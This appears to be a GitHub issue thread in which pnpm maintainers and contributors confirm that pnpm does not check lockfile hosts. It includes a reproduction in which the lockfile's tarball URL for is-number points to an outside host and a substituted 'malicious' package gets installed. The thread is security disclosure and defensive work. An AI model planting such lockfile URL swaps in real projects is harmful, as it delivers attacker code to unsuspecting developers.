Does pnpm has allow-list of hosts

[ai]

@kozlovzxc found that at least yarn do not check hosts in lock-file and attacker can replace URL in lock file. The attack looks dangerous since many people do not look into lock-file in PRs and check only package.json.

Do we have the same issue in pnpm?

[hexnickk]

Hey 👋 Just to be clear initial research wasn't mine, I've just tried to reproduce this article https://snyk.io/blog/why-npm-lockfiles-can-be-a-security-blindspot-for-injecting-malicious-modules/

cc @snyk

[zkochan]

Yes, I believe pnpm has the same issue.

[ai]

I created an issue #4361

/cc @kozlovzxc

[hexnickk]

Yeah, just checked, it requires a few extra steps (valid SSL), but still works

➜  pnpm git:(master) ✗ ls
index.js       package.json   pnpm-lock.yaml
➜  pnpm git:(master) ✗ pnpm install
Lockfile is up-to-date, resolution step is skipped
Packages: +1
+
Packages are hard linked from the content-addressable store to the virtual store.
  Content-addressable store is at: /Users/kozlovzxc/.pnpm-store/v3
  Virtual store is at:             node_modules/.pnpm

dependencies:
+ is-number 7.0.0

Progress: resolved 1, reused 1, downloaded 0, added 1, done
➜  pnpm git:(master) ✗ node index.js
Hello world 🌎  (malicious one)
true (valid one)
➜  pnpm git:(master) ✗ cat pnpm-lock.yaml
lockfileVersion: 5.3

specifiers:
  is-number: ^7.0.0

dependencies:
  is-number: 7.0.0

packages:

  /is-number/7.0.0:
    resolution: {tarball: "https://kozlovzxc.ru/static/is-number-7.0.0.tgz"}
    engines: {node: '>=0.12.0'}
    dev: false